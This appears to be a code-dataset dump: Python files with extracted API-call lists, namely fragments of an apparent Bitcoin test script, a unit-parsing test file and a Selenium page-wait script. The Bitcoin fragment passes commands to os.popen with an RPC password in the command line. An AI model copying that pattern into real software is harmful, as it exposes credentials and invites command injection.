False, 'import time\n'), ((1270, 1281), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (1279, 1281), False, 'import os\n'), ((1373, 1386), 'os.popen', 'os.popen', (['cmd'], {}), '(cmd)\n', (1381, 1386), False, 'import os\n'), ((1465, 1698), 'os.popen', 'os.popen', (["('./../../src/bitcoin-cli -rpcuser=cybersec -rpcpassword=<KEY>GW8kIuL1slRVFXoFpGsXXTIA55V3iUYLckn8rj8MZHBpmdGQjLxakotkj83ZlSRx1aOJ4BFxdvDNz0WHk1i2OPgXL4nsd56Ph991eKNbXVJHtzqCXUbtDELVf4shFJXame -rpcport=8332 '\n + cmd)"], {}), "(\n './../../src/bitcoin-cli -rpcuser=cybersec -rpcpassword=<KEY>GW8kIuL1slRVFXoFpGsXXTIA55V3iUYLckn8rj8MZHBpmdGQjLxakotkj83ZlSRx1aOJ4BFxdvDNz0WHk1i2OPgXL4nsd56Ph991eKNbXVJHtzqCXUbtDELVf4shFJXame -rpcport=8332 '\n + cmd)\n", (1473, 1698), False, 'import os\n'), ((3202, 3223), 'random.getrandbits', 'random.getrandbits', (['(8)'], {}), '(8)\n', (3220, 3223), False, 'import random\n'), ((3272, 3293), 'random.getrandbits', 'random.getrandbits', (['(8)'], {}), '(8)\n', (3290, 3293), False, 'import random\n'), ((4246, 4267), 'random.getrandbits', 'random.getrandbits', (['(8)'], {}), '(8)\n', (4264, 4267), False, 'import random\n'), ((7997, 8040), 'time.sleep', 'time.sleep', (['seconds_between_version_packets'], {}), '(seconds_between_version_packets)\n', (8007, 8040), False, 'import time\n'), ((8051, 8069), 'socket.send', 'socket.send', (['block'], {}), '(block)\n', (8062, 8069), False, 'import socket\n'), ((2076, 2113), 'random.randint', 'random.randint', (['minimum_ip_range', '(255)'], {}), '(minimum_ip_range, 255)\n', (2090, 2113), False, 'import random\n'), ((3328, 3351), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (3349, 3351), False, 'import datetime\n'), ((3354, 3383), 'datetime.datetime', 'datetime.datetime', (['(1970)', '(1)', '(1)'], {}), '(1970, 1, 1)\n', (3371, 3383), False, 'import datetime\n')] |
import logging
from testing_func import testing_func, test_logger
from unit_parse import logger, Unit, Q
from unit_parse.utils import *
test_logger.setLevel(logging.DEBUG)
logger.setLevel(logging.DEBUG)
test_split_list = [
# positive control (changes)
[["fish","pig", "cow"], ["f", "is", "h", "pig", "cow"], {"chunks": ["is"]}],
[["fish", Unit("g"), "cow"], ["f", "is", "h", Unit("g"), "cow"], {"chunks": ["is"]}],
[["fishpigcow"], ["f", "i", "shpigcow"], {"chunks": ["i"]}],
[["fishpigcow"], ["f", "i", "shpig", "c", "ow"], {"chunks": ["i", "c"]}],
# negative control (no changes)
[["fish"], ["fish"], {"chunks": ["fish"]}],
[["fishpigcow"], ["fishpigcow"], {"chunks": ["z"]}],
[[Unit("g")], [Unit("g")], {"chunks": ["is"]}],
]
testing_func(split_list, test_split_list)
test_round_off = [ # [Input, Output]
# positive control (works)
[234.2342300000001, 234.23423, {"sig_digit": 15}],
[234.2342399999999999, 234.23424, {"sig_digit": 15}],
[234.2342300000001, 234.23, {"sig_digit": 5}],
[234.2342399999999999, 234.23, {"sig_digit": 5}],
[234.2342399999999999, 200, {"sig_digit": 1}],
[-234.2342399999999999, -200, {"sig_digit": 1}],
[-234.2342399999999999, -234.23424, {"sig_digit": 15}],
# negative control (fails)
]
testing_func(sig_figs, test_round_off)
test_list_depth = [ # [Input, Output]
# positive control (works)
["", 0],
[[], 0],
["asds", 0],
[1, 0],
[["aaa"], 1],
[[["aaa"]], 2],
[[["aaa", "aaa", "aaa"], ["aaa"], ["aaa"]], 2],
[[["aaa", "aaa", "aaa"], ["aaa"], ["aaa"]], 2],
[[[["aaa"], ["aaa"], ["aaa"]]], 3],
# negative control (fails)
]
testing_func(get_list_depth, test_list_depth)
test_remove_empty_cells = [ # [Input, Output]
# positive control (works)
[[], None],
[[""], None],
[["asds"], ["asds"]],
[1, 1],
[["aaa", ""], ["aaa"]],
[["aaa", []], ["aaa"]],
[[["aaa", []]], [["aaa"]]],
[[["aaa", [""]]], [["aaa"]]],
# negative control (fails)
]
testing_func(remove_empty_cells, test_remove_empty_cells)
examples_quantity_difference = [
[Q("5 g"), Q("0.5"), {"quantity2": Q("10 g")}],
[5, 1, {"quantity2": Q("10 g")}],
]
testing_func(quantity_difference, examples_quantity_difference)
| [
"unit_parse.Unit",
"unit_parse.Q",
"testing_func.test_logger.setLevel",
"testing_func.testing_func",
"unit_parse.logger.setLevel"
]
| [((138, 173), 'testing_func.test_logger.setLevel', 'test_logger.setLevel', (['logging.DEBUG'], {}), '(logging.DEBUG)\n', (158, 173), False, 'from testing_func import testing_func, test_logger\n'), ((174, 204), 'unit_parse.logger.setLevel', 'logger.setLevel', (['logging.DEBUG'], {}), '(logging.DEBUG)\n', (189, 204), False, 'from unit_parse import logger, Unit, Q\n'), ((770, 811), 'testing_func.testing_func', 'testing_func', (['split_list', 'test_split_list'], {}), '(split_list, test_split_list)\n', (782, 811), False, 'from testing_func import testing_func, test_logger\n'), ((1299, 1337), 'testing_func.testing_func', 'testing_func', (['sig_figs', 'test_round_off'], {}), '(sig_figs, test_round_off)\n', (1311, 1337), False, 'from testing_func import testing_func, test_logger\n'), ((1682, 1727), 'testing_func.testing_func', 'testing_func', (['get_list_depth', 'test_list_depth'], {}), '(get_list_depth, test_list_depth)\n', (1694, 1727), False, 'from testing_func import testing_func, test_logger\n'), ((2037, 2094), 'testing_func.testing_func', 'testing_func', (['remove_empty_cells', 'test_remove_empty_cells'], {}), '(remove_empty_cells, test_remove_empty_cells)\n', (2049, 2094), False, 'from testing_func import testing_func, test_logger\n'), ((2223, 2286), 'testing_func.testing_func', 'testing_func', (['quantity_difference', 'examples_quantity_difference'], {}), '(quantity_difference, examples_quantity_difference)\n', (2235, 2286), False, 'from testing_func import testing_func, test_logger\n'), ((2135, 2143), 'unit_parse.Q', 'Q', (['"""5 g"""'], {}), "('5 g')\n", (2136, 2143), False, 'from unit_parse import logger, Unit, Q\n'), ((2145, 2153), 'unit_parse.Q', 'Q', (['"""0.5"""'], {}), "('0.5')\n", (2146, 2153), False, 'from unit_parse import logger, Unit, Q\n'), ((355, 364), 'unit_parse.Unit', 'Unit', (['"""g"""'], {}), "('g')\n", (359, 364), False, 'from unit_parse import logger, Unit, Q\n'), ((391, 400), 'unit_parse.Unit', 'Unit', (['"""g"""'], {}), "('g')\n", (395, 400), False, 'from unit_parse import logger, Unit, Q\n'), ((722, 731), 'unit_parse.Unit', 'Unit', (['"""g"""'], {}), "('g')\n", (726, 731), False, 'from unit_parse import logger, Unit, Q\n'), ((735, 744), 'unit_parse.Unit', 'Unit', (['"""g"""'], {}), "('g')\n", (739, 744), False, 'from unit_parse import logger, Unit, Q\n'), ((2169, 2178), 'unit_parse.Q', 'Q', (['"""10 g"""'], {}), "('10 g')\n", (2170, 2178), False, 'from unit_parse import logger, Unit, Q\n'), ((2208, 2217), 'unit_parse.Q', 'Q', (['"""10 g"""'], {}), "('10 g')\n", (2209, 2217), False, 'from unit_parse import logger, Unit, Q\n')] |
from functools import partial
from selenium.webdriver import Firefox
from selenium.webdriver.support.ui import (
WebDriverWait
)
def esperar_elemento(elemento, webdriver):
print(f'Tentando encontrar "{elemento}"')
if webdriver.find_elements_by_css_selector(elemento):
return True
return False
esperar_botao = partial(esperar_elemento, 'button')
esperar_sucesso = partial(esperar_elemento, '#finished')
url = 'https://selenium.dunossauro.live/aula_09_a.html'
driver = Firefox()
wdw = WebDriverWait(driver, 10)
driver.get(url)
wdw.until(esperar_botao, 'Deu ruim')
driver.find_element_by_css_selector('button').click()
wdw.until(
esperar_sucesso,
'A mensagem de sucesso não apareceu'
)
sucesso = driver.find_element_by_css_selector('#finished')
assert sucesso.text == 'Carregamento concluído'
| [
"selenium.webdriver.support.ui.WebDriverWait",
"selenium.webdriver.Firefox",
"functools.partial"
]
| [((337, 372), 'functools.partial', 'partial', (['esperar_elemento', '"""button"""'], {}), "(esperar_elemento, 'button')\n", (344, 372), False, 'from functools import partial\n'), ((391, 429), 'functools.partial', 'partial', (['esperar_elemento', '"""#finished"""'], {}), "(esperar_elemento, '#finished')\n", (398, 429), False, 'from functools import partial\n'), ((497, 506), 'selenium.webdriver.Firefox', 'Firefox', ([], {}), '()\n', (504, 506), False, 'from selenium.webdriver import Firefox\n'), ((514, 539), 'selenium.webdriver.support.ui.WebDriverWait', 'WebDriverWait', (['driver', '(10)'], {}), '(driver, 10)\n', (527, 539), False, 'from selenium.webdriver.support.ui import WebDriverWait\n')] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.